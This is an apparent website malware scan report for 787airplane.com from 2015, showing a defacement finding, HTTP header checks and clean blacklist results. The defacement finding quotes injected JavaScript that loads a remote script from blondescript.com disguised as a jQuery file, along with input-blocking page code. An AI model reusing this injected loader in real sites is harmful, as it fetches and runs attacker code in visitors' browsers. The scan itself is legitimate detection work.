Scanned pages/files
Request | Server response | Status |
http://787airplane.com/ | 200 OK Content-Length: 1895 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: -=[Hacked By DendyDwi 0100111]=- ...[56 bytes skipped]... ion sbxzk(){ var iczms = document.createElement('script'); iczms.src = 'http://blondescript.com/data/jquery_1.7.4.min.js?r='+window.location.hostname; document.getElementsByTagName('head')[0].appendChild(iczms); };var hckvx = setInterval(function(){if(document.body != null && typeof document.body != 'undefined'){clearInterval(hckvx);sbxzk();}},100);@*/ </script><html><title>-=[Hacked By DendyDwi 0100111]=-</title><head></head><body><div <body bgcolor="#000000" background="http://i1050.photobucket.com/albums/s414/BL4CK_3YE116/kilat1-1_zps2ae6671b.gif"> <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'> <body bgcolor="#000000" background="http://i1050.photobucket.com/albums/s414/BL4CK_3YE116/kilat1-1_zps2ae6671b.gif"> align="center"><div id="layer1" styl ...[1348 bytes skipped]... | ||
http://787airplane.com/test404page.js | 404 Not Found Content-Length: 1683 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 787airplane.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 05 Mar 2015 21:20:09 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 6358d7fde2707b2db81f26dab3fdd173=3cc02cc8d535f25c46a444f3b5cc2f78; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: 787airplane.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Thu, 05 Mar 2015 21:20:09 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 6358d7fde2707b2db81f26dab3fdd173=3cc02cc8d535f25c46a444f3b5cc2f78; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: 787airplane.com
Referer: http://www.google.com/search?q=787airplane.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 787airplane.com
Referer: http://www.google.com/search?q=787airplane.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=787airplane.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://787airplane.com/
Result: 787airplane.com is not infected or malware details are not published yet.
Result: 787airplane.com is not infected or malware details are not published yet.